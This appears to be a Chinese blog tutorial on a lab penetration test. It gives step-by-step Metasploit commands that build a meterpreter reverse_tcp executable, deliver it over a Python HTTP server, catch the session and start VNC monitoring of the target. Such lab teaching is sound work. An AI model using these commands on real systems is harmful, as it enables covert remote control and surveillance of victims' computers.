一次简单的渗透测试

最新推荐文章于 2023-04-10 17:45:26 发布
最新推荐文章于 2023-04-10 17:45:26 发布
阅读量322 收藏
点赞数
分类专栏: 网络安全 文章标签: 网络安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunkaijie123/article/details/128547899
版权
该文介绍了如何在KaliLinux环境下,使用msfvenom生成针对Windows10IoT企业版的恶意可执行文件,通过本地http服务器将其传输到靶机,然后利用msfconsole设置exploit模块,监听并控制靶机,最后通过运行test.exe实现meterpreter会话,以进行远程监控。
摘要由CSDN通过智能技术生成

一、环境

kali2022.4,靶机环境win10物联网企业版,工具:msfvenom、msfconsole、python3

二、具体步骤

1、管理员权限打开终端

2、生成可执行文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=指定端口 -f exe -o test.exe

3、在目标靶机下载生成的test.exe程序

1)在kali执行python3 -m http.server

2)在目标靶机进行下载

4、执行msfconsole命令

5、配置参数

use exploit/multi/handler(选择模块)

set payload windows/meterpreter/reverse_tcp(选择攻击模块)

set LhOST 本地ip

set lport 指定端口号

show options(查看配置的参数)

exploit -z -j(后台执行)

6、在靶机运行可执行程序test.exe

7、执行sessions查看上钩的用户

8、执行sessions -i 1进行攻击,出现meterpreter说明你就已经成功的入侵的对方的电脑

9、运行run vnc -i进行远程监控靶机

古道青阳
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
某平台的一次简单渗透测试记录
HBohan的博客
11-17 2456
目标 某平台系统(www.target.net) 流程 本次渗透测试的流程图: 【技术资料】 测试 拿到站点后先做信息收集,扫描目录看看有无敏感信息 寥寥无几,没有任何信息,启动burpsuite打开网站走一遍流程。 在创建目标处存在图片上传接口,上传shell试试。 没有任何过滤,可直接上传,但当前目录不解析,猜测projectKey控制上传路径 可跨目录上传,但当前/webapp/test/uploadFile/路径非网站根目录,爆破了常见网站目录但没有一个是正确的解析shell的,先放
[xueqi]在校园内网中的一次简单渗透测试
XUEQI的博客
10-12 2731
首先设备接入在学校内网,lan网络的掩码是255.255.252.0 我的ip为10.3.16.* 开启扫描器扫了一遍自己网段机器,由于周末发现存活的ip很少,果断扩大扫描网络,增加网络号区间。 一通扫描发现大量的存活的主机,对几个常用端口扫描,发现几个投影仪存活,存在80端口,小伙伴简单研究下,发现web控制界面弱口令,然后可以进行开关机,调节参数等权限。 还发现大量开启135,138,1...
简单的练习渗透测试的方法(真的很简单
caption88的博客
12-01 1684
首先渗透测试就是传说的黑客选手。砸门现在开始教程(文中涉及很多下载链接,本人就是使用这个链接,所以我也不知道有没有中毒,不过既然要做这一行,砸门不是已经被黑就是在被黑的路上。所以没有关系啦) 第一步:虽然我们不能确定自己被没有被黑,或者我们安装的软件是否有毒的情况下,砸门先开一个保护的东西再说:比如360,或者电脑管家,或者知名公司旗下的产品。知名公司例如:知道创宇,360,绿盟等。我反正...
day09、1 - 简单渗透测试流程
Edimade的博客
05-08 1218
一、hacker的攻击基本流程(渗透测试流程)>二、渗透工具>三、渗透工具渗透原理>四、渗透攻击举例--IPC$>五、相关命令总结
第18节 简单渗透测试流程及实验
m0_64378913的博客
01-03 2412
本文章仅供教学研究使用,切莫在真实环境中试验。本节主要围绕网络渗透流程这一主题,从概述入手介绍扫描漏洞、暴力破解、445漏洞利用之IPC$、留后门等主要步骤,随后对每个步骤采用一个小实验进行讲解分析。
web调用exe_WEB安全渗透测试基础知识(八)
weixin_39848097的博客
12-12 234
3.5. 命令注入3.5.1. 简介命令注入通常因为指Web应用在服务器上拼接系统命令而造成的漏洞。该类漏洞通常出现在调用外部程序完成一些功能的情景下。比如一些Web管理界面的配置主机名/IP/掩码/网关、查看系统信息以及关闭重启等功能,或者一些站点提供如ping、nslookup、提供发送邮件、转换图片等功能都可能出现该类漏洞。3.5.2. 常见危险函数3.5.2.1. PHPsystemexe...
利用MS12-020进行的一次简单渗透测试
meyo的博客
09-12 2万+
一、 实验目的 掌握Nmap扫描器的安装与使用; 掌握Nmap进行远程OS检测的原理; 掌握Nessus在本机或远程控制,进行漏洞分析扫描; 掌握Metasploit对目标漏洞的利用; 运用Nmap、Nessus、Metasploit进行一次简单的内网渗透; 该实验为综合性实验。 二、 实验原理及方法 用Nmap对目标主机进行扫描,从而得到目标主机的主机发现、端口扫描、应用与版本侦测、...
网络安全】记一次简单渗透测试实战
lzhy666的博客
03-29 380
网络安全】记一次简单渗透测试实战
一次曲折的渗透测试之旅1
08-03
在本文中,作者分享了一次具体的渗透测试经历,这是一次授权测试,即得到目标网站所有者的许可进行的测试。首先,进行了信息收集阶段,这是渗透测试的第一步。通过扫描子域名和端口,获取目标系统的基本信息。在这次...
渗透测试指南——工具
热门推荐
weixin_43526443的博客
11-05 6万+
——D&X安全实验室 工欲善其事,必先利其器。回到过去的旧时代,渗透测试是一件非常困难的事,并且需要大量的手动操作。然而如今,渗透测试工具是"安全军火库"中最常使用的装备,一整套的自动化测试工具似乎不仅改造了渗透测试人员,甚至还可以增强计算机的性能,进行比以往更全面的测试。 对渗透测试人员来说不用任何自动化工具对网站或者应用程序进行渗透测试是一件十分困难的事。因此选择一个正确的工具则变得尤为重要,正确的选择甚至占去了渗透测试成功的半壁江山。本篇文章就来和大家介绍一...
电脑桌面app客户端、微信公众号-小程序测试方法
最新发布
希望我的博客,能帮上你解决学习中工作中所遇到的问题
04-10 1366
电脑桌面app客户端、微信公众号-小程序测试方法
Metasploit(MSF)渗透测试入门
2301_77147728的博客
03-29 955
MSF所用功能主要可分为这几个模块,每个模块都有各自的功能领域,形成了渗透测试的流程1、Auxiliary(辅助模块)为渗透测试信息搜集提供了大量的辅助模块支持2、Exploits(攻击模块)利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。3、Payload(攻击载荷模块)攻击成功后促使靶机运行的一段植入代码4、Post (后渗透攻击模块)收集更多信息或进一步访问被利用的目标系统5、Encoders(编码模块)
渗透测试常用方法总结
MzHeader的博客
06-19 1万+
1 渗透流程 信息收集 漏洞验证/漏洞攻击 提权,权限维持 日志清理 其他 1 信息收集 一般先运行端口扫描和漏洞扫描获取可以利用的漏洞。多利用搜索引擎 端口扫描 有授权的情况下直接使用 nmap 、msscan 、自己写py脚本等端口扫描工具直接获取开放的端口和获取服务端的 banner 信息。 使用 Python 端口扫描的介绍 https://thief.one/2018/05/17/1...
靶机 Hacknos:1
m0_51811529的博客
08-30 487
靶机1
在Linux中使用Python启动http服务详细攻略
Linux I Tell U
09-15 7851
前言 当你需要内建一个简单的WEB页面,又不想配置apache或者Nginx,并把需要共享的目录或者文件都以HTTP的方式展示出来。Python自带http服务,并且使用起来也非常简单。 一般Linux系统都是自带的Python的,Windows下则需要先安装python,所以你可以不费吹灰之力,快速解决这个问题。 下面所做的操作都是在Ubuntu20.04的环境上实现的 Python2启动方式 python -m SimpleHTTPServer 服务启动,默认端口为 8000 Python3启动方式
靶场练习第二十五天~vulnhub靶场之Raven-2
qq_57976347的博客
02-18 1061
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A 192.168.101.128 2.网站的信息收集 (1)靶机开放了80端口,先访问靶机网站看看有什么有用的信息 访问靶机网站,
01-【python】python开启HTTP服务
qq_42303254的博客
10-27 308
https://www.cnblogs.com/orange777/p/10783499.html
Kali下使用一行python代码实现简易的http服务器
汗的博客
04-30 3279
比如我在kali的tmp目录下执行下列代码,就可以在当前目录开启一个http服务 python -m SimpleHTTPServer 然后就可以从另一台机器访问kali的ip下/tmp目录的内容,这样就可以传输文件等操作, ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

古道青阳

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值